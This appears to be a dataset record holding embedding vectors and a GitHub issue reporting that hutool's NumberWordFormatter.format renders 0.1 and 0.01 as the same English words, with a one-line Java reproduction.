0.005898107774555683, 0.0027286927215754986, -0.006221763323992491, -0.007774622179567814, 0.006294069346040487, -0.010377639904618263, -0.001307534403167665, -0.017642676830291748, 0.012119871564209461, 0.016857638955116272, -0.008931518532335758, 0.0033191919792443514, 0.021994812414050102, 0.018248669803142548, -0.009496194310486317, 0.006328500807285309, -0.013875875622034073, 0.0054677147418260574, -0.022738531231880188, 0.0013643463607877493, -0.0037564714439213276, -0.00567774660885334, -0.006194218527525663, -0.011114472523331642, 0.010935429483652115, 0.0023568328469991684, -0.016761230304837227, 0.01783549226820469, -0.010935429483652115, 0.009069244377315044, -0.01010218821465969, -0.010391412302851677, -0.002856089035049081, -0.02008042298257351, 0.004386567045003176, 0.018345078453421593, -0.012994430027902126, -0.006152900401502848, -0.006321614608168602, 0.004751540254801512, -0.0014048032462596893, -0.006597066298127174, -0.02886733040213585, -0.03277874365448952, -0.01822112500667572, 0.016334280371665955, 0.0029542185366153717, -0.0009726885473355651, 0.017394769936800003, 0.002411923371255398, -0.011906396597623825, 0.014888159930706024, -0.0035636553075164557, -0.009324037469923496, -0.023234345018863678, -0.005347204394638538, 0.018303759396076202, -0.012374663725495338, 0.008332411758601665, -0.005040764808654785, 0.0016105312388390303, 0.026140358299016953, -0.030437404289841652, 0.0013695110101252794, -0.003990605473518372, -0.00004952211384079419, 0.024694237858057022, 0.015535471960902214, -0.019956469535827637, 0.002127863699570298, 0.0007828851812519133, -0.01757381297647953, 0.006600509397685528, -0.02271098643541336, 0.011073155328631401, -0.010783931240439415, -0.014474982395768166, 0.019873835146427155, 0.03388055041432381, 0.012512389570474625, 0.022146310657262802, 0.008174027316272259, -0.000022313195586320944, -0.0217882227152586, -0.004462316166609526, -0.013318086043000221, -0.009874940849840641, 0.004290158860385418, 0.012161188758909702, -0.006304399110376835, -0.0026116257067769766, 0.01684386655688286, 0.007299467921257019, -0.006232093088328838, -0.0018197023309767246, 0.013145928271114826, 0.005942868534475565, 0.010446502827107906, -0.013545333407819271, -0.004083570092916489, -0.00905547197908163, 0.014364802278578281, 0.018427712842822075, 0.0025530923157930374, -0.002256981795653701, -0.004386567045003176, 0.008972836658358574, -0.012354005128145218, 0.011210881173610687, 0.007760849315673113, -0.024102017283439636, -0.010274345055222511, 0.017601357772946358, -0.0009494473342783749, 0.005075196269899607, -0.018276214599609375, -0.030134407803416252, -0.014516300521790981, -0.0008952177595347166, 0.011920168995857239, 0.018400168046355247, -0.014901932328939438, 0.026140358299016953, -0.0003204277018085122, 0.010129733011126518, -0.011830647476017475, 0.009627033956348896, 0.0004953825264237821, -0.006311285309493542, -0.011107586324214935, -0.007306354120373726, 0.01841394044458866, 0.014282166957855225, -0.007416534703224897, 0.0035154512152075768, 0.008029414340853691, 0.030575130134820938, -0.024363696575164795, 0.003465525805950165, -0.014585163444280624, 0.028233790770173073, -0.004682677797973156, -0.010632432997226715, -0.007685100194066763, -0.004093899857252836, 0.007430307567119598, -0.002630562987178564, -0.002523825503885746, 0.01604505628347397, -0.010467161424458027, 0.02468046545982361, 0.0031625288538634777, 0.013097724877297878, 0.0027441869024187326, 0.008676726371049881, 0.007113538216799498, -0.011961487121880054, -0.009916258044540882, 0.01692650280892849, -0.002133028581738472, -0.01008152961730957, 0.005309329833835363, -0.0038666522596031427, -0.003202125197276473, -0.019639700651168823, -0.007457852829247713, 0.012119871564209461, 0.013937852345407009, 0.005264569073915482, -0.010322549380362034, 0.032696109265089035, -0.000584043504204601, -0.01030877698212862, -0.03746142238378525, -0.0170366819947958, -0.017670221626758575, 0.004221295937895775, -0.01180998794734478, -0.008525228127837181, 0.006380148231983185, -0.004290158860385418, -0.027090666815638542, -0.030106863006949425, 0.006259637884795666, -0.01487438753247261, -0.027021804824471474, 0.010412070900201797, 0.015204929746687412, -0.00020002522796858102, 0.01285670418292284, -0.007395876105874777, 0.013765694573521614, -0.0083668427541852, -0.0036325182300060987, -0.006690031383186579, -0.02293134666979313, -0.016182782128453255, -0.028040975332260132, 0.014970795251429081, 0.006927608512341976, -0.014254621230065823, -0.0018524121260270476, 0.01776663027703762, 0.006479999516159296, -0.04222673550248146, -0.0037426988128572702, -0.0026598297990858555, 0.0011870242888107896, 0.011245312169194221, -0.002701147459447384, 0.010522251948714256, 0.01970856450498104, -0.020672643557190895, -0.011617172509431839, -0.012354005128145218, -0.009771646000444889, -0.021815769374370575, -0.0039010834880173206, -0.010873452760279179, 0.009151879698038101, -0.0069930278696119785, -0.015989966690540314, -0.01378635410219431, -0.011720466427505016, 0.013056406751275063, -0.004345249384641647, -0.035781167447566986, 0.01498456858098507, 0.01593487709760666, 0.0033329646103084087, -0.0011586183682084084, 0.0022259934339672327, 0.0011715302243828773, 0.01791812852025032, -0.003229670226573944, -0.00903481338173151, 0.011252198368310928, -0.017546268180012703, -0.008029414340853691, 0.022655896842479706, -0.012443526647984982, 0.01265011541545391, 0.017353452742099762, 0.019143886864185333, -0.008566545322537422, -0.01669236831367016, 0.005708734970539808, 0.004093899857252836, -0.012071667239069939, 0.013793240301311016, -0.0162791907787323, -0.011768670752644539, 0.007065333891659975, 0.010026439093053341, -0.001500350539572537, -0.009709669277071953, 0.017325907945632935, 0.023688839748501778, 0.002272475976496935, -0.004527735989540815, 0.016113920137286186, 0.005419510882347822, 0.023055300116539, 0.009351582266390324, -0.01973610930144787, 0.0003978984896093607, -0.014171985909342766, 0.025727180764079094, 0.017560040578246117, -0.008091391064226627, 0.0028646967839449644, 0.005729393567889929, 0.001205961685627699, -0.018248669803142548, 0.0032262271270155907, -0.000169467311934568, -0.019267840310931206, -0.008201572112739086, -0.01188573706895113, -0.005684632807970047, -0.004930584225803614, 0.006896620150655508, -0.003493070835247636, -0.002568586263805628, -0.017394769936800003, -0.01378635410219431, -0.0027028690092265606, 0.013910306617617607, 0.02346847765147686, -0.00928271934390068, -0.000014350922356243245, -0.010191709734499454, -0.003739255713298917, -0.0156731978058815, -0.0102881183847785, 0.002630562987178564, 0.009330923669040203, 0.01472288928925991, 0.004971901886165142, 0.015067203901708126, -0.022766076028347015, -0.015122294425964355, -0.03456917777657509, 0.0059015508741140366, 0.011630944907665253, 0.008835110813379288, 0.014860615134239197, -0.023523569107055664, -0.02685653232038021, 0.008029414340853691, 0.010033325292170048, 0.016595959663391113, -0.0034121570643037558, -0.005488373804837465, -0.016761230304837227, 0.024983461946249008, -0.014406119473278522, 0.007953665219247341, 0.010315663181245327, 0.0170366819947958, 0.009248288348317146, -0.024900827556848526, 0.004076683893799782, 0.0065385326743125916, 0.004348692484200001, -0.0031108816619962454, 0.012891136109828949, 0.006479999516159296, -0.003326078411191702, -0.016802549362182617, -0.023082846775650978, -0.007712645456194878, -0.015012113377451897, -0.021388817578554153, -0.0027975556440651417, -0.0034672473557293415, 0.02571340836584568, 0.006999914534389973, -0.02642958238720894, -0.02152654342353344, 0.018152261152863503, 0.014833069406449795, -0.006294069346040487, 0.007106652017682791, 0.005192263051867485, 0.003091944381594658, 0.014598935842514038, -0.02385411038994789, 0.017022909596562386, -0.0010544632095843554, -0.0036187455989420414, 0.0006184749654494226, 0.001112135942094028, 0.011307288892567158, -0.0039079696871340275, 0.016761230304837227, -0.01811094395816326, 0.00916565302759409, -0.005822358652949333, -0.0003727204748429358, 0.015425290912389755, 0.0072650364600121975, -0.004462316166609526, 0.014433665201067924, 0.016995364800095558, 0.0063939206302165985, 0.0029438892379403114, -0.01638937182724476, -0.007471625227481127, 0.01462648157030344, 0.0031883525662124157, -0.004748097155243158, -0.027448754757642746, -0.014103122986853123, -0.007974324747920036, 0.0020073535852134228, 0.007271922659128904, 0.0006154621951282024, 0.013070179149508476, -0.008380615152418613, 0.01875825598835945, -0.004493304528295994, -0.003021359909325838, -0.02616790495812893, 0.008463251404464245, 0.014433665201067924, 0.0018971730023622513, 0.017890583723783493, -0.007781508378684521, 0.0016750901704654098, -0.0021416363306343555, -0.01852412149310112, 0.027627797797322273, 0.010040211491286755, -0.013180360198020935, -0.004531179089099169, 0.0034431451931595802, 0.0325583815574646, -0.004124888218939304, -0.005674303509294987, -0.02658108063042164, 0.019501974806189537, -0.009847395122051239, 0.009613261558115482, 0.0024033153895288706, -0.0016139743383973837, 0.00888331513851881, -0.0006326779257506132, -0.026112813502550125, -0.0016914451261982322, -0.010639319196343422, -0.005285228136926889, -0.009248288348317146, 0.006531646475195885, -0.015370200388133526, -0.0211822297424078, -0.021622952073812485, 0.010907884687185287, -0.015108521096408367, 0.0016380763845518231, -0.02023192122578621, -0.001558884046971798, -0.008580317720770836, -0.0282613355666399, -0.010467161424458027, -0.0029215088579803705, 0.017257044091820717, -0.01738099753856659, -0.0011560360435396433, -0.017146863043308258, 0.040684204548597336, 0.004920254461467266, -0.0036876085214316845, 0.004854834638535976, -0.00012847235484514385, 0.0108941113576293, -0.007320126984268427, 0.014709116891026497, -0.005577895324677229, -0.011190222576260567, 0.006813984364271164, -0.01578337885439396, -0.0167336855083704, -0.015576789155602455, 0.01260879822075367, 0.0014314876170828938, 0.006204547826200724, -0.01276029646396637, -0.006858745589852333, 0.014447437599301338, 0.002031455747783184, 0.027379890903830528, 0.003938958048820496, 0.0009666630649007857, -0.039885394275188446, 0.0028595321346074343, 0.00635260296985507, -0.004224739037454128, -0.007154855877161026, -0.008153367787599564, 0.0014590327627956867, -0.00507863936945796, -0.021388817578554153, -0.025685863569378853, 0.00612535560503602, -0.0023447819985449314, 0.0054849302396178246, -0.007705759257078171, -0.02141636423766613, -0.017201954498887062, 0.012595025822520256, -0.01386210322380066, 0.0012705206172540784, 0.008311753161251545, -0.015012113377451897, 0.003116046544164419, 0.019804971292614937, -0.0494435653090477, -0.002203613054007292, -0.011348607018589973, -0.02894996479153633, 0.02152654342353344, 0.028096064925193787, -0.0005371306906454265, -0.0007686821627430618, 0.005746609531342983, -0.01962592825293541, 0.01036386750638485, -0.005033878609538078, -0.022738531231880188, -0.010191709734499454, 0.0026030177250504494, -0.007602464873343706, 0.00693105161190033, 0.006207990925759077, -0.015989966690540314, 0.02437746897339821, 0.007574919611215591, -0.017821719869971275, 0.010322549380362034, 0.01772531121969223, -0.0016027841484174132, 0.016182782128453255, 0.01038452610373497, -0.005192263051867485, -0.000825063674710691, 0.027793068438768387, -0.023647522553801537, -0.01053602434694767, 0.002678767079487443, -0.007175514940172434, -0.01061177346855402, -0.00035055523039773107, 0.012044122442603111, 0.010026439093053341, 0.003455196274444461, -0.00017269526142627, -0.000013974327885080129, 0.0060289474204182625, -0.029500868171453476, -0.00313842692412436, 0.014488755725324154, -0.009702783077955246, -0.003348458791151643, -0.003517172997817397, -0.007065333891659975, -0.005822358652949333, 0.009007267653942108, 0.00880756601691246, -0.018992388620972633, 0.0069551533088088036, -0.006676258519291878, 0.014213304035365582, -0.054071154445409775, -0.013772580772638321, -0.006813984364271164, 0.0018248669803142548, -0.00034689687890931964, -0.02517627738416195, -0.014309711754322052, -0.0083668427541852, -0.005333431996405125, -0.015094748698174953, -0.024281060323119164, -0.0012300636153668165, -0.0026977043598890305, 0.017849264666438103, -0.005987629760056734, -0.018042081966996193, 0.02050737291574478, 0.04093211144208908, 0.0054298401810228825, -0.020741507411003113, 0.002881912514567375, -0.01795944571495056, 0.016651051118969917, -0.00642835209146142, -0.014805524609982967, -0.01837262324988842, 0.019309159368276596, -0.00029546490986831486, 0.004844505339860916, -0.00544705567881465, 0.025079870596528053, 0.008428819477558136, -0.005960084497928619, 0.006042719818651676, 0.009103676304221153, -0.0210307314991951, -0.004513963591307402, -0.00827043503522873, 0.0008315196027979255, -0.017945673316717148, -0.0217882227152586, -0.046468690037727356, -0.004365907981991768, 0.012422868050634861, 0.01852412149310112, -0.020452283322811127, 0.0010277788387611508, 0.013180360198020935, 0.014392347075045109, 0.008304866030812263, 0.010040211491286755, 0.00020400635548867285, 0.002453241031616926, 0.006514430977404118, 0.002182953990995884, -0.026140358299016953, 0.014585163444280624, 0.010095302015542984, 0.01051536574959755, 0.005412624217569828, 0.014833069406449795, -0.008325525559484959, 0.0043383631855249405, 0.024542739614844322, 0.024708010256290436, -0.014819297008216381, 0.007209946401417255, -0.012030350044369698, -0.017628904432058334, 0.006063378881663084, 0.02545172907412052, 0.003079893533140421, 0.029638594016432762, 0.0072650364600121975, 0.0007867586682550609, 0.01997024193406105, -0.004407226108014584, -0.012085439637303352, -0.02894996479153633, -0.016595959663391113, -0.015907330438494682, 0.00920697022229433, -0.02023192122578621, 0.01165848970413208, 0.0016010625986382365, 0.019653473049402237, 0.026002632454037666, 0.024625375866889954, -0.028164928779006004, -0.008077618665993214, 0.002477342961356044, 0.004176535177975893, 0.00709287915378809, -0.01632050797343254, -0.01268454734236002, 0.0007897714385762811, 0.0037048242520540953, -0.028288882225751877, -0.015411518514156342, 0.0009451434016227722, -0.007416534703224897, 0.008318639360368252, -0.03484462946653366, 0.004235068801790476, 0.0282613355666399, 0.011692921631038189, 0.003377725603058934, 0.006108139641582966, -0.00276312418282032, -0.02001156099140644, 0.000059125261032022536, -0.02418465167284012, -0.018840890377759933, -0.0014814132591709495, 0.006142571102827787, 0.0026873748283833265, -0.0027837830130010843, -0.0048617213033139706, -0.01008152961730957, 0.0028096064925193787, -0.005047651007771492, -0.005698405206203461, 0.013352517038583755, 0.0030971092637628317, 0.008146481588482857, -0.007361444644629955, 0.010680636391043663, 0.007058447692543268, -0.011878850869834423, -0.0016002018237486482, -0.018703164532780647, -0.003763357875868678, -0.009234515950083733, -0.015838468447327614, -0.008890201337635517, -0.0011612006928771734, 0.0014177151024341583, 0.01817980781197548, -0.01378635410219431, 0.001630329294130206, 0.005946312099695206, -0.0010088415583595634, -0.024845736101269722, -0.010632432997226715, -0.010632432997226715, 0.024129562079906464, -0.0037082673516124487, 0.006152900401502848, -0.013910306617617607, -0.003122932743281126, -0.009909371845424175, -0.0007398458546958864, -0.00816025398671627, 0.0031969603151082993, -0.0013901699567213655, -0.004128331318497658, 0.0265948548913002, -0.025506820529699326, 0.02681521512567997, -0.013249223120510578, -0.018083399161696434, -0.009158766828477383, 0.03242065757513046, 0.015246246941387653, 0.014364802278578281, -0.04432016611099243, -0.003845993196591735, -0.009764759801328182, 0.0011947713792324066, 0.0029008497949689627, 0.002325844718143344, -0.013813898898661137, -0.00890397373586893, 0.02361997589468956, -0.0022001697216182947, 0.0227523036301136, 0.009585716761648655, 0.01232646033167839, -0.008477023802697659, 0.024294832721352577, -0.02156786248087883, 0.01608637534081936, 0.024969689548015594, 0.03332964703440666, 0.01619655452668667, -0.007609351072460413, -0.01992892473936081, 0.004971901886165142, -0.006638383958488703, 0.0023034641053527594, -0.02137504518032074, 0.0020607225596904755, 0.01283604558557272, 0.004865164402872324, -0.018551666289567947, 0.0059394254349172115, 0.0013695110101252794, -0.022449307143688202, 0.011782443150877953, 0.001414271886460483, 0.017739083617925644, -0.009454877115786076, 0.00769198639318347, 0.00928271934390068, 0.02312416397035122, 0.017146863043308258, -0.01232646033167839, -0.004593155812472105, 0.003770244074985385, 0.009399786591529846, 0.0010269180638715625, -0.006070265080779791, 0.029115237295627594, 0.02092055045068264, 0.002830265322700143, -0.03156675770878792, 0.02947332337498665, -0.02070019021630287, -0.019612155854701996, 0.025933770462870598, 0.01561810728162527, -0.015287565067410469, -0.016458233818411827, 0.007382103707641363, -0.014474982395768166, 0.0068759610876441, 0.014681571163237095, -0.011692921631038189, -0.0036772792227566242, -0.007884802296757698, -0.012347118929028511, 0.030878126621246338, -0.010122846812009811, -0.0064696697518229485, -0.024515194818377495, -0.00633194437250495, -0.007196173537522554, 0.011575854383409023, -0.023234345018863678, -0.009819850325584412, 0.00021487378398887813, -0.014502528123557568, 0.0006399946287274361, 0.0011896067298948765, 0.015191157348453999, 0.02483196370303631, -0.007299467921257019, 0.017215726897120476, 0.0065523055382072926, 0.020934322848916054, 0.0027872261125594378, -0.008594091050326824, 0.003191795665770769, 0.03597398102283478, 0.0009322316036559641, 0.016403144225478172, 0.018055854365229607, 0.011906396597623825, 0.026498446241021156, -0.01502588577568531, -0.015948649495840073, -0.019116342067718506, -0.005577895324677229, -0.0004648246103897691, -0.0021313070319592953, -0.03123621456325054, 0.03983030468225479, -0.010267458856105804, -0.00664871372282505, -0.014764207415282726, 0.0038356638979166746, -0.026333175599575043, 0.0018214238807559013, -0.010391412302851677, -0.01021236926317215, 0.013813898898661137, 0.022160083055496216, -0.01947443000972271, 0.005343761295080185, 0.013077065348625183, 0.015962421894073486, -0.017325907945632935, 0.013710604049265385, -0.000573714089114219, 0.016003739088773727, 0.0083668427541852, 0.006903506349772215, 0.008910859934985638, -0.021099593490362167, 0.000003876900791510707, 0.004018150735646486, -0.0031969603151082993, 0.00890397373586893, -0.015700742602348328, 0.00006057783684809692, 0.007705759257078171, -0.019529519602656364, 0.007595578674226999, 0.015659425407648087, -0.010577342472970486, 0.0027958338614553213, -0.017009137198328972, -0.013352517038583755, -0.013772580772638321, -0.005725950468331575, 0.0030661209020763636, -0.01253304909914732, -0.023688839748501778, -0.004569053649902344, -0.0014719446189701557, -0.003753028344362974, 0.016898956149816513, 0.015301337465643883, -0.002952496986836195, 0.036607518792152405, -0.01313904207199812, 0.01947443000972271, 0.005016662646085024, 0.004217852838337421, -0.018000762909650803, -0.013132155872881413, -0.002732135821133852, -0.011913282796740532, 0.017284588888287544, -0.003625632030889392, -0.016485780477523804, -0.018303759396076202, 0.004909925162792206, -0.009454877115786076, 0.00754048814997077, 0.02411578968167305, 0.0004022024222649634, 0.009627033956348896, 0.007526715751737356, -0.013717491179704666, -0.016251645982265472, 0.02277984842658043, 0.01848280429840088, 0.008580317720770836, -0.023895427584648132, 0.02856433391571045, 0.013173473998904228, 0.033412281423807144, 0.020107967779040337, 0.013689945451915264, -0.028013430535793304, -0.023633748292922974, 0.006490328814834356, -0.009083017706871033, -0.008470137603580952, -0.018537893891334534, -0.018345078453421593, 0.009833622723817825, 0.010728840716183186, -0.014240848831832409, 0.020521145313978195, 0.014392347075045109, 0.016403144225478172, -0.024625375866889954, 0.006559191737323999, -0.023633748292922974, 0.002630562987178564, 0.01651332527399063, 0.004472645930945873, -0.013097724877297878, 0.003391498001292348, 0.009633920155465603, -0.006479999516159296, -0.02662239968776703, 0.005774154793471098, 0.0002038987586274743, 0.003140148473903537, -0.0158246960490942, 0.01216807495802641, -0.022573260590434074, -0.013386948965489864, 0.022435534745454788, 0.006238979287445545, -0.006913835648447275, 0.030327223241329193, 0.014805524609982967, -0.01105249673128128, 0.004093899857252836, -0.020342102274298668, 0.015053431503474712, -0.015370200388133526, -0.0023895427584648132, -0.0022363229654729366, 0.008146481588482857, -0.019226523116230965, -0.008180913515388966, -0.005863676313310862, -0.00269081792794168, 0.004345249384641647, -0.006101253442466259, 0.011920168995857239, 0.006452454254031181, 0.026567308232188225, -0.0037495852448046207, 0.006996471434831619, 0.04765313118696213, -0.007058447692543268, 0.001414271886460483, -0.027242165058851242, -0.02707689441740513, -0.008786906488239765, 0.030602674931287766, -0.010584228672087193, -0.003976832609623671, 0.027379890903830528, 0.0038253343664109707, -0.0034827415365725756, -0.0029714342672377825, 0.026980485767126083, -0.009689010679721832, 0.002503166673704982, 0.0008620775188319385, 0.015287565067410469, -0.0037117106840014458, -0.0011698085581883788, 0.0105911148712039, -0.006769223604351282, 0.017518723383545876, 0.009530626237392426, -0.00939290039241314, 0.01718818210065365, 0.009289605543017387, 0.0031797445844858885, -0.006683145184069872, 0.018510349094867706, 0.005960084497928619, 0.002363719278946519, 0.005994515959173441, 0.026608627289533615, 0.0048858230002224445, 0.0033622314222157, -0.009530626237392426, 0.014378574676811695, 0.006693474482744932, 0.013552219606935978, 0.012657001614570618, 0.009551284834742546, 0.004114558454602957, 0.0004108102584723383, -0.010983633808791637, 0.0017026353161782026, -0.0034569178242236376, 0.012429754249751568, -0.0032658232375979424, 0.008662953972816467, -0.01441989280283451, -0.009275833144783974, 0.04043629765510559, 0.003701381152495742, 0.008174027316272259, -0.02806852012872696, -0.004434770904481411, -0.0028319871053099632, -0.044898614287376404, 0.027242165058851242, -0.015342655591666698, 0.005471157841384411, -0.007671327795833349, -0.015535471960902214, 0.0025375981349498034, -0.008731815963983536, 0.010570456273853779, 0.0053540910594165325, 0.011190222576260567, 0.015962421894073486, -0.005285228136926889, 0.019047480076551437, -0.011307288892567158, -0.008993495255708694, -0.020493600517511368, 0.020672643557190895, -0.0012782677076756954, 0.020603781566023827, -0.020493600517511368, 0.018661847338080406, -0.008525228127837181, 0.014543845318257809, -0.001076843705959618, -0.014557618647813797, 0.00038649304769933224, -0.00019195534696336836, -0.013173473998904228, -0.007003357633948326, -0.014502528123557568, 0.0156731978058815, -0.01105249673128128, -0.0038907541893422604, -0.026636172086000443, 0.003524059196934104, -0.003529223846271634, -0.006669372320175171, 0.02046605572104454, 0.0016931666759774089, -0.004744654055684805, 0.004400339443236589, 0.010295004583895206, 0.020245693624019623, 0.029418233782052994, 0.008353070355951786, -0.0010604887502267957, 0.031511664390563965, -0.017146863043308258, 0.01180998794734478, 0.006053049582988024, 0.007478511426597834, 0.02126486599445343, -0.011300402693450451, -0.004624144174158573, 0.025011006742715836, 0.011686035431921482, 0.012422868050634861, 0.023909199982881546, -0.01457139104604721, 0.05544841289520264, -0.014461209997534752, -0.018496576696634293, 0.03484462946653366, 0.006975812371820211, -0.011155790649354458, -0.015149839222431183, -0.002363719278946519, -0.0005913602071814239, -0.0067864395678043365, -0.0004902178188785911, 0.004427884705364704, -0.004734324757009745, 0.029611049219965935, 0.00003951547114411369, -0.024542739614844322, 0.0005629542283713818, 0.012223165482282639, 0.0007725557079538703, -0.0107426131144166, -0.008690498769283295, -0.002723527839407325, -0.011135132052004337, 0.01727081649005413, -0.0034414236433804035, -0.009647693485021591, -0.01856543868780136, -0.007877916097640991, 0.007051561493426561, 0.01145190093666315, -0.03242065757513046, -0.002770010381937027, 0.012925567105412483, -0.0019970242865383625, 0.008284207433462143, -0.018014535307884216, 0.00373236951418221, 0.02202235721051693, -0.011679149232804775, 0.01742231473326683, 0.0030299678910523653, -0.002961104968562722, 0.020837916061282158, 0.01023302786052227, 0.00834618415683508, -0.004775642417371273, -0.007203059736639261, 0.0016966098919510841, -0.003031689440831542, -0.015948649495840073, -0.004868607502430677, -0.018427712842822075, 0.00811893679201603, 0.023372070863842964, 0.026787670329213142, 0.022848712280392647, -0.0038150050677359104, -0.005178490653634071, -0.00656952103599906, 0.019446885213255882, 0.005026991944760084, 0.0022879699245095253, -0.0013720934512093663, 0.0026873748283833265, 0.01038452610373497, 0.0022638679947704077, 0.035698529332876205, -0.011190222576260567, 0.04211655259132385, -0.01158274058252573, 0.008855769410729408, -0.014213304035365582, -0.020755279809236526, 0.003038575639948249, -0.013152815401554108, -0.013758808374404907, -0.028977511450648308, -0.004751540254801512, -0.00005804927786812186, -0.016719913110136986, 0.023344524204730988, 0.003918299451470375, 0.013311199843883514, -0.0028887989465147257, 0.0024497979320585728, 0.004228182602673769, -0.013462698087096214, -0.00373236951418221, -0.01684386655688286, -0.0036118593998253345, 0.007602464873343706, 0.01378635410219431, 0.014888159930706024, -0.0006313867634162307, 0.012450413778424263, 0.005739723332226276, 0.02434992417693138, -0.015108521096408367, 0.02556191012263298, 0.0022655895445495844, 0.007209946401417255, -0.013194132596254349, 0.01492947805672884, 0.003625632030889392, 0.025093642994761467, 0.016788776963949203, -0.012946226634085178, -0.022642122581601143, 0.009806077927350998, 0.008718043565750122, 0.01727081649005413, -0.016761230304837227, -0.003567098407074809, 0.013304313644766808, -0.019956469535827637, 0.012436640448868275, 0.01917143352329731, 0.036387160420417786, 0.00254448433406651, 0.006462783552706242, -0.022394217550754547, 0.005326545797288418, -0.004930584225803614, 0.0021795108914375305, 0.004276386462152004, -0.02293134666979313, 0.007802166976034641, 0.0010363867040723562, -0.007141083478927612, -0.010432730428874493, 0.00044115298078395426, -0.020039105787873268, -0.016430689021945, 0.01268454734236002, -0.001284293131902814, 0.010598001070320606, 0.02012174017727375, 0.02517627738416195, 0.023137936368584633, -0.01225071121007204, -0.014406119473278522, 0.0023981507401913404, -0.001978087006136775, -0.020934322848916054, 0.0029421676881611347, 0.0015175662701949477, -0.003942401148378849, 0.013132155872881413, 0.011892624199390411, -0.016141464933753014, -0.000004751137112180004, -0.010260572656989098, -0.0005113070947118104, 0.002983485348522663, 0.00020927867444697767, -0.008545886725187302, -0.003400105983018875, 0.0029869284480810165, 0.008036301471292973, 0.0035636553075164557, -0.024790646508336067, -0.0009339531534351408, 0.0007024016231298447, 0.016375599429011345, 0.031208667904138565, -0.0013195854844525456, 0.00948930811136961, 0.000415114191127941, 0.006531646475195885, -0.0007850371184758842, -0.014447437599301338, 0.007141083478927612, -0.010171051137149334, -0.029500868171453476, -0.017504950985312462, -0.026388265192508698, -0.014915705658495426, -0.013056406751275063, 0.00819468591362238, -0.009124334901571274, -0.0068105412647128105, -0.012891136109828949, 0.002546205883845687, -0.001272242167033255, 0.005987629760056734, -0.012601912021636963, 0.005106184631586075, 0.01247795857489109, 0.009957576170563698, 0.0208792332559824, 0.011059382930397987, -0.011995918117463589, 0.016306735575199127, -0.029914045706391335, 0.013125269673764706, 0.03454163298010826, -0.00034216255880892277, 0.011665375903248787, -0.0018575768917798996, -0.015521698631346226, -0.0035602122079581022, 0.012340232729911804, 0.027737978845834732, 0.02894996479153633, -0.011300402693450451, 0.01962592825293541, 0.01692650280892849, 0.008249776437878609, 0.010949201881885529, 0.009812964126467705, 0.003914856351912022, 0.01017793733626604, -0.024515194818377495, -0.005973856896162033, 0.00269081792794168, 0.0062493085861206055, -0.009936917573213577, 0.0007815939607098699, 0.015700742602348328, -0.003990605473518372, -0.0037185968831181526, -0.023000210523605347, -0.003615302499383688, 0.03319191932678223, 0.0013066736282780766, 0.040684204548597336, -0.00179215706884861, 0.018744483590126038, 0.004947799723595381, 0.013924079947173595, 0.013159701600670815, 0.004438214469701052, 0.03162184730172157, -0.002737300470471382, 0.02837151661515236, 0.004593155812472105, 0.012057894840836525, -0.010598001070320606, -0.015370200388133526, -0.031704481691122055, 0.008490796200931072, -0.005812029354274273, 0.020837916061282158, 0.03542307764291763, 0.020672643557190895, -0.021512771025300026, -0.015494153834879398, -0.007939892821013927, 0.0026701590977609158, -0.00880756601691246, -0.02985895611345768, 0.012312687933444977, -0.011300402693450451, 0.0020710518583655357, 0.0023774919100105762, 0.006813984364271164, 0.025658318772912025, -0.0022965779062360525, 0.011314175091683865, -0.005140616092830896, 0.0027958338614553213, -0.022160083055496216, 0.0032761527691036463, -0.016403144225478172, -0.005016662646085024, -0.0032916469499468803, 0.022945120930671692, -0.011245312169194221, 0.0038046755362302065, -0.017628904432058334, -0.003171136835590005, 0.018386395648121834 ]
null
null
null
null
null
null
null
null
null
[ "dromara", "hutool" ]
### 版本情况 JDK版本: openjdk_8_201 hutool版本: 5.8.27 ### 问题描述(包括截图) 1. 复现代码 ```java NumberWordFormatter.format(0.1).equals(NumberWordFormatter.format(0.01)) ```
NumberWordFormatter.format 只有1位小数转英文有BUG
https://api.github.com/repos/dromara/hutool/issues/3579/comments
1
2024-05-11T02:27:08
2024-05-13T07:35:56Z
https://github.com/dromara/hutool/issues/3579
2,290,602,758
3,579
false
This is a GitHub Issue repo:hutool owner:dromara Title : NumberWordFormatter.format 只有1位小数转英文有BUG Issue date: --- start body --- ### 版本情况 JDK版本: openjdk_8_201 hutool版本: 5.8.27 ### 问题描述(包括截图) 1. 复现代码 ```java NumberWordFormatter.format(0.1).equals(NumberWordFormatter.format(0.01)) ``` --- end body ---
324
[ -0.012678653001785278, 0.0023816146422177553, 0.0007497136830352247, 0.019052917137742043, 0.016506318002939224, -0.005625036079436541, 0.013742323964834213, 0.06751596182584763, -0.015341713093221188, 0.015132084488868713, -0.00836185459047556, 0.03909962996840477, -0.011164668016135693, 0.017965953797101974, -0.021615045145154, 0.03534184396266937, 0.0033948200289160013, 0.015481466427445412, -0.02304362691938877, -0.007057498674839735, -0.05894447863101959, 0.019844848662614822, -0.008105642162263393, 0.030015720054507256, -0.001221863436512649, 0.020885227248072624, -0.03422382101416588, 0.012026474811136723, -0.0037500241305679083, 0.0031153149902820587, -0.012150699272751808, 0.0011422821553424, 0.024875937029719353, 0.003998472820967436, 0.012973685748875141, 0.008447259664535522, 0.04444127902388573, 0.05220530554652214, -0.024441150948405266, -0.0055590420961380005, -0.025900786742568016, -0.038509562611579895, -0.03409959748387337, 0.042733192443847656, 0.001493604271672666, 0.020465970039367676, -0.004576892592012882, 0.02385108545422554, -0.03406854346394539, 0.0021021098364144564, 0.03990709036588669, -0.005562923848628998, 0.01325319055467844, 0.009309066459536552, 0.013214370235800743, 0.0034821652807295322, 0.04158411920070648, 0.012601012364029884, 0.010962803848087788, -0.01881999708712101, -0.008765583857893944, 0.011646037921309471, 0.011164668016135693, 0.012624304741621017, -0.026816941797733307, 0.01066777016967535, -0.047360554337501526, 0.032515738159418106, 0.023245491087436676, 0.04965870454907417, 0.008734527975320816, 0.014239221811294556, 0.034658607095479965, 0.057981740683317184, -0.0035326313227415085, -0.02822999469935894, 0.05012454465031624, -0.015458174049854279, -0.021024979650974274, -0.01774856075644493, -0.017174024134874344, 0.024347983300685883, -0.010310625657439232, -0.029115093871951103, -0.016739238053560257, 0.012911573983728886, -0.03220517560839653, -0.06913088262081146, -0.032919466495513916, 0.015147613361477852, -0.019580870866775513, 0.0017003214452415705, -0.019161613658070564, -0.005601744167506695, -0.003125020070001483, 0.025807619094848633, -0.023959781974554062, 0.02678588591516018, -0.07142902910709381, 0.0072050150483846664, -0.016630541533231735, 0.0018808350432664156, 0.009293537586927414, 0.0026921757962554693, 0.04785745218396187, -0.015054444782435894, 0.015628982335329056, -0.021397653967142105, 0.030248641967773438, 0.0759011059999466, 0.013043561950325966, 